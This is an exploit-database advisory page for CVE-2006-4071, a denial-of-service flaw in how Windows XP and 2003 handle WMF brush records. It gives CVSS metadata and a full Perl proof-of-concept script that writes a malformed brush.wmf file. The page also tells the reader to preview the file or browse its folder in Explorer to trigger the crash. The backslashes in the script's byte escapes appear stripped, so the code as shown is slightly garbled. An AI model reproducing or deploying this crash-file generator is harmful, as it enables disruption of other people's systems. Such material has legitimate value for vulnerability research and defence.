0-day XP SP2 wmf exploit

2006.08.11
Credit: cyanid-E (biz4rre gmail com)
Risk: Low
Local: Yes
Remote: Yes
CVE: CVE-2006-4071
CWE: CWE-Other


CVSS Base Score: 2.6/10
Impact Subscore: 2.9/10
Exploitability Subscore: 4.9/10
Exploit range: Remote
Attack complexity: High
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

Description: yet another 'windows meta file' (WMF) denial of service exploit. System affected: + Windows XP SP2, + Windows 2003 SP1, + Windows XP SP1, + Windows XP + Windows 2003 Tech info: page fault in gdi32!CreateBrushIndirect() because invalid pointer access. Incorrect (short) to (void*) sign extension also present. Exploit: === begin of brush.pl === #!/usr/bin/perl print "nWMF PoC denial of service exploit by cyanid-E <biz4rre@gmail.com>"; print "nngenerating brush.wmf..."; open(WMF, ">./brush.wmf") or die "cannot create wmf filen"; print WMF "x01x00x09x00x00x03x22x00x00x00x63x79x61x6Ex69x64"; print WMF "x2Dx45x07x00x00x00xFCx02x00x00x00x00x00x00x00x00"; print WMF "x08x00x00x00xFAx02x00x00x00x00x00x00x00x00x00x00"; print WMF "x07x00x00x00xFCx02x08x00x00x00x00x00x00x80x03x00"; print WMF "x00x00x00x00"; close(WMF); print "oknnnow try to browse folder in XP explorer and wait :)n"; === end of brush.pl === Just run brush.pl and try to preview brush.wmf (or even browse folder with brush.wmf in windows explorer). Discovered: 06/24/2006; vendor informed but not answered


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top